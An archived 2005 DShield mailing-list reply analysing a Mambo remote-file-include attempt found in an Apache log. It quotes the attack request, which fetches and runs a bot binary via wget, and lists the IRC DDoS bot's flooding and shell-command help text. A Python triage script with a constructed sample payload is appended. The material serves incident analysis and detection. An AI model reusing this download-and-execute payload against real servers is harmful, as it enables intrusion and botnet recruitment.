[Dshield] Can Someone Decipher This Log Entry?
security at admin.fulgan.com
Thu Dec 22 10:30:34 GMT 2005
I've masked part of the IP you provided in your message, just in
case. It's a bit silly considering you didn't do the same, but,
well, it does no additional harm...
It looks like this is an attempt to exploit a flaw in the Mambo
content management software (looks like it's this one:
If the exploit succeeds, it will try to wget a file called "micu" from
XXX.136.48.69 into the /tmp folder and execute it.
At this moment, that server is still serving the file so I checked it.
What it does is try to download and execute two more files: "mare" and "ro".
"mare" isn't available on the remote server but "ro" is. It looks like
an ELF executable. Now, I'm not a specialist of that file format so
I may be completely wrong here, but this looks like a Linux x86
executable file. It seems to link the /lib/ld-linux.so.2 library and
import a bunch of functions that you expect from an IP server program.
It also contains a number of strings that indicate that it might try
to contact an IRC server (*.undernet.org). It also has a nice internal
help that is probably intended to be used by the attacker:
NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI <target> <secs>
NOTICE %s :Tsunami heading for %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :MOVE <server>
NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :SERVER <server> = Changes servers
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION = Requests version of client
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :HELP = Displays this
NOTICE %s :IRC <command> = Sends this command to the server
NOTICE %s :SH <command> = Executes a command
NOTICE %s :Killing pid %d.
So what this looks like is a client for a DDoS botnet.
Other entries in the program seem to indicate it's been compiled on a
There is also something that looks very much like an HTTP request:
GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
It would be interesting to see if the request matches your log entry:
I think the above request is part of the exploit code.
I did a bit of Google research and found several DDoS clients that are
apparently based on the same code and that contain the same string
That's all I can say about this... The attacker is still up and
running and probably still scanning networks trying to drop its
Wednesday, December 21, 2005, 10:53:14 PM, you wrote:
DCH> I have about 25 of these today. I've added index2.php to the firewall watcher.
DCH> I cannot make sense of this Apache print:
DCH> 188.8.131.52 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 200 21 "-"
Stephane mailto:security at admin.fulgan.com
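The two pieces of analysis in the message above (reading the injected request out of the Apache log, and eyeballing the downloaded file's ELF header) can be scripted for triage. The following is an added example for this archive page; it is not code from the poster, from DShield or from the Mambo project. The function names, the sample log line and the sample ELF header bytes are constructed, with the documentation addresses 192.0.2.10 and 198.51.100.7 standing in for the masked hosts. It generalizes slightly beyond the thread's entry: any mosConfig_* parameter set to a remote URL is flagged, not only mosConfig_absolute_path.

```python
"""Triage helpers for the Mambo remote-file-include log entry discussed above.

Added example for this archive page; not code from the poster, DShield or
Mambo.  SAMPLE_LOG and SAMPLE_ELF_HEADER are constructed inputs."""

import re
import struct
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-log line with the same shape as the thread's entry;
# 198.51.100.7 is the scanning client, 192.0.2.10 the download host (placeholders).
SAMPLE_LOG = (
    '198.51.100.7 - - [21/Dec/2005:16:47:41 -0500] '
    '"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?'
    '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
    'mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&'
    'cmd=cd%20/tmp;wget%20192.0.2.10/micu;chmod%20744%20micu;./micu;'
    'echo%20YYY;echo| HTTP/1.1" 200 21 "-"'
)

APACHE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
URL_SCHEMES = ("http://", "https://", "ftp://")
# Downloader invocations inside the injected command; options are skipped.
FETCH_RE = re.compile(r'\b(?:wget|curl)\s+(?:-\S+\s+)*(\S+)')


def split_query(query):
    """Split on '&' only, never on ';': the injected shell command uses ';'."""
    pairs = []
    for chunk in query.split("&"):
        key, _, value = chunk.partition("=")
        pairs.append((unquote(key), unquote(value)))
    return pairs


def triage_mambo_rfi(line):
    """Return a finding dict for a Mambo remote-file-include attempt, else None.

    The tell-tale is a client-supplied mosConfig_* global (normally defined
    only in configuration.php) pointing at a remote URL; the 'cmd' parameter
    then carries the shell command the included script would run.
    """
    m = APACHE_RE.match(line)
    if not m:
        return None
    pairs = split_query(urlsplit(m.group("target")).query)
    include = [(k, v) for k, v in pairs
               if k.startswith("mosConfig_") and v.lower().startswith(URL_SCHEMES)]
    if not include:
        return None
    cmd = next((v for k, v in pairs if k == "cmd"), "")
    commands = [c.strip() for c in cmd.split(";") if c.strip()]
    downloads = [u for c in commands for u in FETCH_RE.findall(c)]
    return {
        "src": m.group("src"),
        "status": int(m.group("status")),
        "rfi_param": include[0][0],
        "include_url": include[0][1],          # the remote "cmd.gif?" script
        "commands": commands,                  # decoded, one entry per ';'
        "download_urls": downloads,            # IoCs to block / hunt for
        "dropped_files": [u.rstrip("/").rsplit("/", 1)[-1] for u in downloads],
        "executed": [c for c in commands if c.startswith("./")],
    }


def elf_header_summary(data):
    """Describe an ELF header (class, byte order, type, machine) or return None.

    Reads only e_ident plus the e_type/e_machine words at offsets 16 and 18,
    enough to confirm what the poster inferred about the "ro" file by eye."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    endian = "<" if data[5] == 1 else ">"
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    return {
        "class": {1: "ELF32", 2: "ELF64"}.get(data[4], "unknown"),
        "byte_order": {1: "little-endian", 2: "big-endian"}.get(data[5], "unknown"),
        "type": {1: "relocatable", 2: "executable",
                 3: "shared object", 4: "core"}.get(e_type, "unknown"),
        "machine": {3: "x86 (EM_386)", 62: "x86-64 (EM_X86_64)",
                    40: "ARM (EM_ARM)"}.get(e_machine, f"e_machine {e_machine}"),
    }


# Constructed header: ELF32, little-endian, executable, EM_386, i.e. the shape
# the poster describes for "ro".  Only the first 20 bytes are populated.
SAMPLE_ELF_HEADER = b"\x7fELF\x01\x01\x01" + bytes(9) + struct.pack("<HH", 2, 3)

if __name__ == "__main__":
    print(triage_mambo_rfi(SAMPLE_LOG))
    print(elf_header_summary(SAMPLE_ELF_HEADER))
```

Running the script prints the decoded command list, the download URL and dropped file name from the sample entry, and an "ELF32 / little-endian / executable / x86" summary for the sample header. Feeding a real access log through triage_mambo_rfi one line at a time gives a quick list of sources and download hosts to block; the HTTP status is kept because a 200 on such a request, as in the thread, means the page was served and the include may have run.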